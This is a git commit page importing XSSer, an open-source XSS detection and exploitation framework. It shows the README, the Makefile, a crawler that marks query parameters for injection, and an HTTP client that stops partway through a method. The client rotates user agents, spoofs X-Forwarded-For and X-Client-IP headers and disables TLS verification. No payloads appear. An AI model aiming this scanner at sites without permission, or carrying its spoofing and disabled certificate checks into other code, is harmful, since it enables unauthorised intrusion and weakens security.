Browse Source

moved from https://github.com/epsylon/xsser

psy 1 year ago
parent
commit
96caedcaf1
54 changed files with 15879 additions and 3 deletions
  1. 53 3
      README.md
  2. 34 0
      xsser/Makefile
  3. 20 0
      xsser/core/__init__.py
  4. 329 0
      xsser/core/crawler.py
  5. 519 0
      xsser/core/curlcontrol.py
  6. 103 0
      xsser/core/dork.py
  7. 116 0
      xsser/core/encdec.py
  8. 52 0
      xsser/core/flashxss.py
  9. 55 0
      xsser/core/fuzzing/DCP.py
  10. 44 0
      xsser/core/fuzzing/DOM.py
  11. 66 0
      xsser/core/fuzzing/HTTPsr.py
  12. 20 0
      xsser/core/fuzzing/__init__.py
  13. 30 0
      xsser/core/fuzzing/dorks.txt
  14. 104 0
      xsser/core/fuzzing/heuristic.py
  15. 95 0
      xsser/core/fuzzing/user-agents.txt
  16. 1145 0
      xsser/core/fuzzing/vectors.py
  17. 616 0
      xsser/core/globalmap.py
  18. 1974 0
      xsser/core/gtkcontroller.py
  19. 68 0
      xsser/core/imagexss.py
  20. 2694 0
      xsser/core/main.py
  21. 164 0
      xsser/core/mozchecker.py
  22. 207 0
      xsser/core/options.py
  23. 20 0
      xsser/core/post/__init__.py
  24. 173 0
      xsser/core/post/xml_exporter.py
  25. 43 0
      xsser/core/randomip.py
  26. 54 0
      xsser/core/reporter.py
  27. 450 0
      xsser/core/threadpool.py
  28. 102 0
      xsser/core/tokenhub.py
  29. 170 0
      xsser/core/twsupport.py
  30. 44 0
      xsser/core/update.py
  31. 17 0
      xsser/doc/AUTHOR
  32. 161 0
      xsser/doc/CHANGELOG
  33. 209 0
      xsser/doc/COPYING
  34. 48 0
      xsser/doc/INSTALL
  35. 11 0
      xsser/doc/MANIFESTO
  36. 171 0
      xsser/doc/README
  37. 5 0
      xsser/doc/requirements.txt
  38. 128 0
      xsser/gtk/docs/about.txt
  39. 16 0
      xsser/gtk/docs/wizard0.txt
  40. 16 0
      xsser/gtk/docs/wizard1.txt
  41. 20 0
      xsser/gtk/docs/wizard2.txt
  42. 20 0
      xsser/gtk/docs/wizard3.txt
  43. 23 0
      xsser/gtk/docs/wizard4.txt
  44. 17 0
      xsser/gtk/docs/wizard5.txt
  45. 16 0
      xsser/gtk/docs/wizard6.txt
  46. BIN
      xsser/gtk/images/world.png
  47. BIN
      xsser/gtk/images/xsser.jpg
  48. BIN
      xsser/gtk/images/xssericon_16x16.png
  49. BIN
      xsser/gtk/images/xssericon_24x24.png
  50. BIN
      xsser/gtk/images/xssericon_32x32.png
  51. 9 0
      xsser/gtk/xsser.desktop
  52. 5333 0
      xsser/gtk/xsser.ui
  53. 57 0
      xsser/setup.py
  54. 38 0
      xsser/xsser

+ 53 - 3
README.md

@@ -1,3 +1,53 @@
-# xsser
-
-Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
+  ![XSSer](https://xsser.03c8.net/xsser/zika1.png "XSSerBanner")
+
+=================================================================== 
+
+ Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+----------
+
+ XSSer is released under the GPLv3. You can find the full license text
+in the [COPYING](./xsser/doc/COPYING) file.
+
+----------
+
+ + Web:  https://xsser.03c8.net
+
+----------
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika2.png "XSSerManifesto")
+
+#### Installing:
+
+ XSSer runs on many platforms. It requires Python and the following libraries:
+
+    - python-pycurl - Python bindings to libcurl
+    - python-xmlbuilder - create xml/(x)html files - Python 2.x
+    - python-beautifulsoup - error-tolerant HTML parser for Python
+    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library
+
+ On Debian-based systems (ex: Ubuntu), run: 
+
+    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
+
+ On other systems (such as: Kali, ArchLinux, ParrotSec, Fedora, etc.), also run:
+
+       pip install geoip 
+
+####  Source libs:
+
+       * Python: https://www.python.org/downloads/
+       * PyCurl: http://pycurl.sourceforge.net/
+       * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
+       * PyGeoIP: https://pypi.python.org/pypi/GeoIP
+
+----------
+
+####  Screenshots:
+
+  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSerSchema")
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika3.png "XSSerAdvanced")
+
+  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSerGeoMap")
+

+ 34 - 0
xsser/Makefile

@@ -0,0 +1,34 @@
+# $Id: Makefile,v 1.6 2008/10/29 01:01:35 ghantoos Exp $
+#
+PYTHON=`which python`
+DESTDIR=/
+BUILDIR=$(CURDIR)/debian/xsser
+PROJECT=xsser
+VERSION=0.7.0
+
+all:
+	@echo "make source - Create source package"
+	@echo "make install - Install on local system"
+	@echo "make buildrpm - Generate a rpm package"
+	@echo "make builddeb - Generate a deb package"
+	@echo "make clean - Get rid of scratch and byte files"
+
+source:
+	$(PYTHON) setup.py sdist $(COMPILE)
+
+install:
+	$(PYTHON) setup.py install --root $(DESTDIR) $(COMPILE)
+
+buildrpm:
+	$(PYTHON) setup.py bdist_rpm --post-install=rpm/postinstall --pre-uninstall=rpm/preuninstall
+
+builddeb:
+	$(PYTHON) setup.py sdist $(COMPILE) --dist-dir=../
+	rename -f 's/$(PROJECT)-(.*)\.tar\.gz/$(PROJECT)_$$1\.orig\.tar\.gz/' ../*
+	dpkg-buildpackage -i -I -rfakeroot
+
+clean:
+	$(PYTHON) setup.py clean
+	$(MAKE) -f $(CURDIR)/debian/rules clean
+	rm -rf build/ MANIFEST
+	find . -name '*.pyc' -delete

+ 20 - 0
xsser/core/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 329 - 0
xsser/core/crawler.py

@@ -0,0 +1,329 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import sys
+import urllib
+import urllib2
+import urlparse
+import pycurl
+import time
+import traceback
+import curlcontrol
+import threadpool
+from Queue import Queue
+from collections import defaultdict
+from BeautifulSoup import BeautifulSoup
+
+class EmergencyLanding(Exception):
+    pass
+
+class Crawler(object):
+    """
+    Crawler class.
+
+    Crawls a webpage looking for url arguments.
+    Don't call from several threads! You should create a new one
+    for every thread.
+    """
+    def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
+        # verbose: 0-no printing, 1-prints dots, 2-prints full output
+        self.verbose = 1
+        self._parent = parent
+        self._to_crawl = []
+        self._parse_external = True
+        self._requests = []
+        self._ownpool = False
+        self._reporter = None
+        self._armed = True
+        self._poolsize = 10
+        self._found_args = defaultdict(list)
+        self.pool = pool
+        if crawled:
+            self._crawled = crawled
+        else:
+            self._crawled = []
+        if curlwrapper:
+            self.curl = curlwrapper
+        else:
+            self.curl = curlcontrol.Curl
+
+    def report(self, msg):
+        if self._reporter:
+            self._reporter.report(msg)
+        else:
+            print msg
+
+    def set_reporter(self, reporter):
+        self._reporter = reporter
+
+    def _find_args(self, url):
+        """
+        find parameters in given url.
+        """
+        parsed = urllib2.urlparse.urlparse(url)
+        qs = urlparse.parse_qs(parsed.query)
+        if parsed.scheme:
+            path = parsed.scheme + "://" + parsed.netloc + parsed.path
+        else:
+            path = parsed.netloc + parsed.path
+        for arg_name in qs:
+            key = (arg_name, parsed.netloc)
+            zipped = zip(*self._found_args[key])
+            if not zipped or not path in zipped[0]:
+                self._found_args[key].append([path, url])
+                self.generate_result(arg_name, path, url)
+        ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
+        if ncurrent >= self._max:
+            self._armed = False
+
+    def cancel(self):
+        self._armed = False
+
+    def crawl(self, path, depth=3, width=0, local_only=True):
+        """
+        setup and perform a crawl on the given url.
+        """
+        if not self._armed:
+            return []
+        parsed = urllib2.urlparse.urlparse(path)
+        basepath = parsed.scheme + "://" + parsed.netloc
+        self._parse_external = not local_only
+        if not self.pool:
+            self.pool = threadpool.ThreadPool(self._poolsize)
+        if self.verbose == 2:
+            self.report("crawling: " + path)
+        if width == 0:
+            self._max = 1000000000
+        else:
+            self._max = int(width)
+        self._path = path
+        self._depth = depth
+        attack_urls = []
+        if not self._parent._landing and self._armed:
+            self._crawl(basepath, path, depth, width)
+            if self._ownpool:
+                self.pool.dismissWorkers(len(self.pool.workers))
+                self.pool.joinAllDismissedWorkers()
+        return attack_urls
+
+    def shutdown(self):
+        if self._ownpool:
+            self.pool.dismissWorkers(len(self.pool.workers))
+            self.pool.joinAllDismissedWorkers()
+
+    def generate_result(self, arg_name, path, url):
+        parsed = urllib2.urlparse.urlparse(url)
+        qs = urlparse.parse_qs(parsed.query)
+        qs_joint = {}
+        for key, val in qs.iteritems():
+            qs_joint[key] = val[0]
+        attack_qs = dict(qs_joint)
+        attack_qs[arg_name] = "VECTOR"
+        attack_url = path + '?' + urllib.urlencode(attack_qs)
+        if not attack_url in self._parent.crawled_urls:
+            self._parent.crawled_urls.append(attack_url)
+
+    def _crawl(self, basepath, path, depth=3, width=0):
+        """
+        perform a crawl on the given url.
+
+        this function downloads and looks for links.
+        """
+        self._crawled.append(path)
+        if not path.startswith("http"):
+            return
+
+        def _cb(request, result):
+            self._get_done(depth, width, request, result)
+
+        self._requests.append(path)
+        self.pool.addRequest(self._curl_main, [[path, depth, width, basepath]],
+                             self._get_done_dummy, self._get_error)
+
+    def _curl_main(self, pars):
+        path, depth, width, basepath = pars
+        if not self._armed or len(self._parent.crawled_urls) >= self._max:
+            raise EmergencyLanding
+        c = self.curl()
+        c.set_timeout(5)
+        try:
+            res = c.get(path)
+        except Exception as error:
+            c.close()
+            del c
+            raise error
+        c_info = c.info().get('content-type', None)
+        c.close()
+        del c
+        self._get_done(basepath, depth, width, path, res, c_info)
+
+    def _get_error(self, request, error):
+        try:
+            path, depth, width, basepath = request.args[0]
+            e_type, e_value, e_tb = error
+            if e_type == pycurl.error:
+                errno, message = e_value.args
+                if errno == 28:
+                    print("requests pyerror -1")
+                    self.enqueue_jobs()
+                    self._requests.remove(path)
+                    return # timeout
+                else:
+                    self.report('crawler curl error: '+message+' ('+str(errno)+')')
+            elif e_type == EmergencyLanding:
+                pass
+            else:
+                traceback.print_tb(e_tb)
+                self.report('crawler error: '+str(e_value)+' '+path)
+            if not e_type == EmergencyLanding:
+                for reporter in self._parent._reporters:
+                    reporter.mosquito_crashed(path, str(e_value))
+            self.enqueue_jobs()
+            self._requests.remove(path)
+        except:
+            return
+
+    def _emergency_parse(self, html_data, start=0):
+        links = set()
+        pos = 0
+        if not html_data:
+            return
+        data_len = len(html_data)
+        while pos < data_len:
+            if len(links)+start > self._max:
+                break
+            pos = html_data.find("href=", pos)
+            if not pos == -1:
+                sep = html_data[pos+5]
+                if sep == "h":
+                    pos -= 1
+                    sep=">"
+                href = html_data[pos+6:html_data.find(sep, pos+7)].split("#")[0]
+                pos = pos+1
+                links.add(href)
+            else:
+                break
+        return map(lambda s: {'href': s}, links)
+
+    def _get_done_dummy(self, request, result):
+        path = request.args[0][0]
+        self.enqueue_jobs()
+        self._requests.remove(path)
+
+    def enqueue_jobs(self):
+        if len(self.pool.workRequests) < int(self._max/2):
+            while self._to_crawl:
+                next_job = self._to_crawl.pop()
+                self._crawl(*next_job)
+
+    def _get_done(self, basepath, depth, width, path, html_data, content_type): # request, result):
+        if not self._armed or len(self._parent.crawled_urls) >= self._max:
+            raise EmergencyLanding
+        try:
+            encoding = content_type.split(";")[1].split("=")[1].strip()
+        except:
+            encoding = None
+        try:
+            soup = BeautifulSoup(html_data, from_encoding=encoding)
+            links = None
+        except:
+            soup = None
+            links = self._emergency_parse(html_data)
+
+        for reporter in self._parent._reporters:
+            reporter.start_crawl(path)
+
+        if not links and soup:
+            links = soup.find_all('a')
+            forms = soup.find_all('form')
+
+            for form in forms:
+                pars = {}
+                if form.has_key("action"):
+                    action_path = urlparse.urljoin(path, form["action"])
+                else:
+                    action_path = path
+                for input_par in form.find_all('input'):
+
+                    if not input_par.has_key("name"):
+                        continue
+                    value = "foo"
+                    if input_par.has_key("value") and input_par["value"]:
+                        value = input_par["value"]
+                    pars[input_par["name"]] = value
+                for input_par in form.findAll('select'):
+                    pars[input_par["name"]] = "1"
+                if pars:
+                    links.append({"url":action_path + '?' + urllib.urlencode(pars)})
+                else:
+                    self.report("form with no pars")
+                    links.append({"url":action_path})
+            links += self._emergency_parse(html_data, len(links))
+        if self.verbose == 2:
+            self.report(" "*(self._depth-depth) + path +" "+ str(len(links)))
+        elif self.verbose:
+            sys.stdout.write(".")
+            sys.stdout.flush()
+        if not links:
+            return
+        if len(links) > self._max:
+            links = links[:self._max]
+        for a in links:
+            try:
+                href = str(a['href'].encode('utf-8'))
+            except KeyError:
+                # this link has no href
+                continue
+            except:
+                # can't decode or something darker..
+                continue
+            if href.startswith("javascript") or href.startswith('mailto:'):
+                continue
+            href = urlparse.urljoin(path, href)
+            if not href.startswith("http") or not "." in href:
+                continue
+            href = href.split('#',1)[0]
+            scheme_rpos = href.rfind('http://')
+            if not scheme_rpos in [0, -1]:
+                # looks like some kind of redirect so we try both too ;)
+                href1 = href[scheme_rpos:]
+                href2 = href[:scheme_rpos]
+                self._check_url(basepath, path, href1, depth, width)
+                self._check_url(basepath, path, href2, depth, width)
+            self._check_url(basepath, path, href, depth, width)
+        return self._found_args
+
+    def _check_url(self, basepath, path, href, depth, width):
+        """
+        process the given url for a crawl
+        check to see if we have to continue crawling on the given url.
+        """
+        do_crawling = self._parse_external or href.startswith(basepath)
+        if do_crawling and not href in self._crawled:
+            self._find_args(href)
+            for reporter in self._parent._reporters:
+                reporter.add_link(path, href)
+            self.report("\n[Info] Spidering: " + str(href))
+            if self._armed and depth>0:
+                if len(self._to_crawl) < self._max:
+                    self._to_crawl.append([basepath, href, depth-1, width])

+ 519 - 0
xsser/core/curlcontrol.py

@@ -0,0 +1,519 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os, urllib, mimetools, pycurl, re, time, random
+
+try:
+    from cStringIO import StringIO
+except ImportError:
+    from StringIO import StringIO
+
+class Curl:
+    """
+    Class to control curl on behalf of the application.
+    """
+    cookie = None
+    dropcookie = None
+    referer = None
+    headers = None
+    proxy = None
+    ignoreproxy = None
+    tcp_nodelay = None
+    xforw = None
+    xclient = None
+    atype = None
+    acred = None
+    #acert = None
+    retries = 1
+    delay = 0
+    followred = 0
+    fli = None
+    agents = [] # user-agents
+    try:
+        f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+    except:
+        f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+    for line in f:
+        agents.append(line)
+    agent = random.choice(agents).strip() # set random user-agent
+
+    def __init__(self, base_url="", fakeheaders=[ 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8']):
+        self.handle = pycurl.Curl()
+        self._closed = False
+        self.set_url(base_url)
+        self.verbosity = 0
+        self.signals = 1
+        self.payload = ""
+        self.header = StringIO()
+        self.fakeheaders = fakeheaders
+        self.headers = None
+        self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        self.set_option(pycurl.SSL_VERIFYPEER, 0)
+        try:
+            self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_2) # max supported version by pycurl
+        except:
+            try:
+                self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_1)
+            except: # use vulnerable TLS/SSL versions (TLS1_0 -> weak enc | SSLv2 + SSLv3 -> deprecated)
+                try:
+                    self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_TLSv1_0)
+                except:
+                    try:
+                        self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)
+                    except:
+                        self.set_option(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv2)
+        self.set_option(pycurl.FOLLOWLOCATION, 0)
+        self.set_option(pycurl.MAXREDIRS, 50)
+        # pointing COOKIEFILE/COOKIEJAR at /dev/null enables libcurl's in-memory cookie engine without persisting cookies to disk
+        self.set_option(pycurl.COOKIEFILE, '/dev/null')
+        self.set_option(pycurl.COOKIEJAR, '/dev/null')
+        self.set_timeout(30)
+        self.set_option(pycurl.NETRC, 1)
+        self.set_nosignals(1)
+
+        def payload_callback(x):
+            self.payload += x
+        self.set_option(pycurl.WRITEFUNCTION, payload_callback)
+        def header_callback(x):
+            self.header.write(x)
+        self.set_option(pycurl.HEADERFUNCTION, header_callback)
+
+    def set_url(self, url):
+        """
+        Set the base url.
+        """
+        self.base_url = url
+        self.set_option(pycurl.URL, self.base_url)
+        return url
+
+    def set_cookie(self, cookie):
+        """
+        Set the app cookie.
+        """
+        self.cookie = cookie
+        self.dropcookie = dropcookie
+        if dropcookie:
+            self.set_option(pycurl.COOKIELIST, 'ALL')
+            self.set_option(pycurl.COOKIE, None)
+        else:
+            self.set_option(pycurl.COOKIELIST, '')
+            self.set_option(pycurl.COOKIE, self.cookie)
+        return cookie
+
+    def set_agent(self, agent):
+        """
+        Set the user agent.
+        """
+        self.agent = agent
+        self.set_option(pycurl.USERAGENT, self.agent)
+        return agent
+
+    def set_referer(self, referer):
+        """
+        Set the referer.
+        """
+        self.referer = referer
+        self.set_option(pycurl.REFERER, self.referer)
+        return referer
+
+    def set_headers(self, headers):
+        """
+        Set extra headers.
+        """
+        self.headers = headers
+        self.headers = self.headers.split("\n")
+        for headerValue in self.headers:
+            header, value = headerValue.split(": ")
+
+            if header and value:
+                self.set_option(pycurl.HTTPHEADER, (header, value))
+        return headers
+
+    def set_proxy(self, ignoreproxy, proxy):
+        """
+        Set the proxy to use.
+        """
+        self.proxy = proxy
+        self.ignoreproxy = ignoreproxy
+        if ignoreproxy:
+            self.set_option(pycurl.PROXY, "")
+        else:
+            self.set_option(pycurl.PROXY, self.proxy)
+        return proxy
+
+    def set_option(self, *args):
+        """
+        Set the given option.
+        """
+        apply(self.handle.setopt, args)
+
+    def set_verbosity(self, level):
+        """
+        Set the verbosity level.
+        """
+        self.set_option(pycurl.VERBOSE, level)
+
+    def set_nosignals(self, signals="1"):
+        """
+        Disable signals.
+
+        curl will be using other means besides signals to timeout
+        """
+        self.signals = signals
+        self.set_option(pycurl.NOSIGNAL, self.signals)
+        return signals
+
+    def set_tcp_nodelay(self, tcp_nodelay):
+        """
+        Set the TCP_NODELAY option.
+        """
+        self.tcp_nodelay = tcp_nodelay
+        self.set_option(pycurl.TCP_NODELAY, tcp_nodelay)
+        return tcp_nodelay
+
+    def set_timeout(self, timeout):
+        """
+        Set timeout for requests.
+        """
+        self.set_option(pycurl.CONNECTTIMEOUT,timeout)
+        self.set_option(pycurl.TIMEOUT, timeout)
+        return timeout
+
+    def set_follow_redirections(self, followred, fli):
+        """
+        Set follow locations parameters to follow redirection pages (302)
+        """
+        self.followred = followred
+        self.fli = fli
+        if followred:
+            self.set_option(pycurl.FOLLOWLOCATION , 1)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            if fli:
+                self.set_option(pycurl.MAXREDIRS, fli)
+        else:
+            self.set_option(pycurl.FOLLOWLOCATION , 0)
+        return followred
+
+    def do_head_check(self, urls):
+        """
+        Send a HEAD request before starting injection, to verify the stability of the target
+        """
+        for u in urls:
+            self.set_option(pycurl.URL, u) 
+            self.set_option(pycurl.NOBODY,1)
+            self.set_option(pycurl.FOLLOWLOCATION, 0)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            self.set_option(pycurl.SSL_VERIFYHOST, 0)
+            self.set_option(pycurl.SSL_VERIFYPEER, 0)
+            if self.fakeheaders:
+                from core.randomip import RandomIP
+                if self.xforw:
+                    generate_random_xforw = RandomIP()
+                    xforwip = generate_random_xforw._generateip('')
+                    xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
+                if self.xclient:
+                    generate_random_xclient = RandomIP()
+                    xclientip = generate_random_xclient._generateip('')
+                    xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
+                if self.xforw:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue)
+                    if self.xclient:
+                        self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue)
+                elif self.xclient:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue)
+            if self.headers:
+                self.fakeheaders = self.fakeheaders + self.headers
+            self.set_option(pycurl.HTTPHEADER, self.fakeheaders)
+            if self.agent:
+                self.set_option(pycurl.USERAGENT, self.agent)
+            if self.referer:
+                self.set_option(pycurl.REFERER, self.referer)
+            if self.proxy:
+                self.set_option(pycurl.PROXY, self.proxy)
+            if self.ignoreproxy:
+                self.set_option(pycurl.PROXY, "")
+            if self.timeout:
+                self.set_option(pycurl.CONNECTTIMEOUT, self.timeout)
+                self.set_option(pycurl.TIMEOUT, self.timeout)
+            if self.signals:
+                self.set_option(pycurl.NOSIGNAL, self.signals)
+            if self.tcp_nodelay:
+                self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay)
+            if self.cookie:
+                self.set_option(pycurl.COOKIE, self.cookie)
+            try:
+                self.handle.perform()
+            except:
+                return
+            if str(self.handle.getinfo(pycurl.HTTP_CODE)) in ["302", "301"]:
+                self.set_option(pycurl.FOLLOWLOCATION, 1)
+
+    def __request(self, relative_url=None):
+        """
+        Perform a request and returns the payload.
+        """
+        if self.fakeheaders:
+            from core.randomip import RandomIP
+            if self.xforw:
+                """
+                Set the X-Forwarded-For to use.
+                """
+                generate_random_xforw = RandomIP()
+                xforwip = generate_random_xforw._generateip('')
+                #xforwip = '127.0.0.1'
+                xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
+            if self.xclient:
+                """ 
+                Set the X-Client-IP to use.
+                """
+                generate_random_xclient = RandomIP()
+                xclientip = generate_random_xclient._generateip('')
+                #xclientip = '127.0.0.1'
+                xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
+            if self.xforw:
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue)
+                if self.xclient:
+                    self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xforwfakevalue + xclientfakevalue)
+            elif self.xclient:
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + xclientfakevalue)
+        if self.headers:
+            # XXX sanitize user input
+            self.fakeheaders = self.fakeheaders + self.headers
+        self.set_option(pycurl.HTTPHEADER, self.fakeheaders)
+
+        if self.agent:
+            self.set_option(pycurl.USERAGENT, self.agent)
+        if self.referer:
+            self.set_option(pycurl.REFERER, self.referer)
+        if self.proxy:
+            self.set_option(pycurl.PROXY, self.proxy)
+        if self.ignoreproxy:
+            self.set_option(pycurl.PROXY, "")
+        if relative_url:
+            self.set_option(pycurl.URL,os.path.join(self.base_url,relative_url))
+        if self.timeout:
+            self.set_option(pycurl.CONNECTTIMEOUT, self.timeout)
+            self.set_option(pycurl.TIMEOUT, self.timeout)
+        if self.signals:
+            self.set_option(pycurl.NOSIGNAL, self.signals)
+        if self.tcp_nodelay:
+            self.set_option(pycurl.TCP_NODELAY, self.tcp_nodelay)
+        if self.cookie:
+            self.set_option(pycurl.COOKIE, self.cookie)
+        if self.followred:
+            self.set_option(pycurl.FOLLOWLOCATION , 1)
+            self.set_option(pycurl.MAXREDIRS, 50)
+            if self.fli:
+                self.set_option(pycurl.MAXREDIRS, int(self.fli))
+        else:
+            self.set_option(pycurl.FOLLOWLOCATION , 0)
+            if self.fli:
+                print "\n[E] You must launch --follow-redirects command to set correctly this redirections limit\n"
+                return
+        """ 
+        Set the HTTP authentication method: Basic, Digest, GSS, NTLM or Certificate
+        """
+        if self.atype and self.acred:
+            atypelower = self.atype.lower()
+            if atypelower not in ( "basic", "digest", "ntlm", "gss" ):
+                print "\n[E] HTTP authentication type value must be: Basic, Digest, GSS or NTLM\n"
+                return
+            acredregexp = re.search("^(.*?)\:(.*?)$", self.acred)
+            if not acredregexp:
+                print "\n[E] HTTP authentication credentials value must be in format username:password\n"
+                return
+            user = acredregexp.group(1)
+            password = acredregexp.group(2)
+            self.set_option(pycurl.USERPWD, "%s:%s" % (user,password))
+
+            if atypelower == "basic":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
+            elif atypelower == "digest":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
+            elif atypelower == "ntlm":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_NTLM)
+            elif atypelower == "gss":
+                self.set_option(pycurl.HTTPAUTH, pycurl.HTTPAUTH_GSSNEGOTIATE)
+            else:
+                self.set_option(pycurl.HTTPAUTH, None)
+
+            self.set_option(pycurl.HTTPHEADER, ["Accept:"])
+
+        elif self.atype and not self.acred:
+            print "\n[E] You specified the HTTP authentication type, but did not provide the credentials\n"
+            return
+        elif not self.atype and self.acred:
+            print "\n[E] You specified the HTTP authentication credentials, but did not provide the type\n"
+            return
+        #if self.acert:
+        #    acertregexp = re.search("^(.+?),\s*(.+?)$", self.acert)
+        #    if not acertregexp:
+        #        print "\n[E] HTTP authentication certificate option must be 'key_file,cert_file'\n"
+        #        return
+        #    # os.path.expanduser for support of paths with ~
+        #    key_file = os.path.expanduser(acertregexp.group(1))
+        #    cert_file = os.path.expanduser(acertregexp.group(2))
+        #    self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        #    self.set_option(pycurl.SSL_VERIFYPEER, 1)
+        #    self.set_option(pycurl.SSH_PUBLIC_KEYFILE, key_file)
+        #    self.set_option(pycurl.CAINFO, cert_file)
+        #    self.set_option(pycurl.SSLCERT, cert_file)
+        #    self.set_option(pycurl.SSLCERTTYPE, 'p12')
+        #    self.set_option(pycurl.SSLCERTPASSWD, '1234')
+        #    self.set_option(pycurl.SSLKEY, key_file)
+        #    self.set_option(pycurl.SSLKEYPASSWD, '1234')
+        #    for file in (key_file, cert_file):
+        #        if not os.path.exists(file):
+        #            print "\n[E] File '%s' doesn't exist\n" % file
+        #            return
+        
+        self.set_option(pycurl.SSL_VERIFYHOST, 0)
+        self.set_option(pycurl.SSL_VERIFYPEER, 0)
+
+        self.header.seek(0,0)
+        self.payload = ""
+
+        for count in range(0, self.retries):
+            time.sleep(self.delay)
+            if self.dropcookie:
+                self.set_option(pycurl.COOKIELIST, 'ALL')
+                nocookie = ['Set-Cookie: ', '']
+                self.set_option(pycurl.HTTPHEADER, self.fakeheaders + nocookie)
+            try:
+                self.handle.perform()
+            except:
+                return
+        return self.payload
+
+    def get(self, url="", params=None):
+        """
+        Get a url.
+        """
+        if params:
+            url += "?" + urllib.urlencode(params)
+        self.set_option(pycurl.HTTPGET, 1)
+        return self.__request(url)
+
+    def post(self, cgi, params):
+        """
+        Post a url.
+        """
+        self.set_option(pycurl.POST, 1)
+        self.set_option(pycurl.POSTFIELDS, params)
+        return self.__request(cgi)
+
    def body(self):
        """
        Get the payload from the latest operation.

        Returns the response body captured during the most recent
        get()/post() call (empty string before any request completes).
        """
        return self.payload
+
    def info(self):
        """
        Get an info dictionary from the selected url.

        Parses the captured response headers into a mimetools.Message
        (Python 2 only; mimetools was removed in Python 3) and merges
        in stringified pycurl transfer statistics.
        """
        # Rewind the header buffer so it can be re-parsed from the top.
        self.header.seek(0,0)
        url = self.handle.getinfo(pycurl.EFFECTIVE_URL)
        if url[:5] == 'http:':
            # Drop the HTTP status line; Message() expects header fields only.
            self.header.readline()
            m = mimetools.Message(self.header)
        else:
            # Non-http effective URL: start from an empty header set.
            m = mimetools.Message(StringIO())
        #m['effective-url'] = url
        m['http-code'] = str(self.handle.getinfo(pycurl.HTTP_CODE))
        m['total-time'] = str(self.handle.getinfo(pycurl.TOTAL_TIME))
        m['namelookup-time'] = str(self.handle.getinfo(pycurl.NAMELOOKUP_TIME))
        m['connect-time'] = str(self.handle.getinfo(pycurl.CONNECT_TIME))
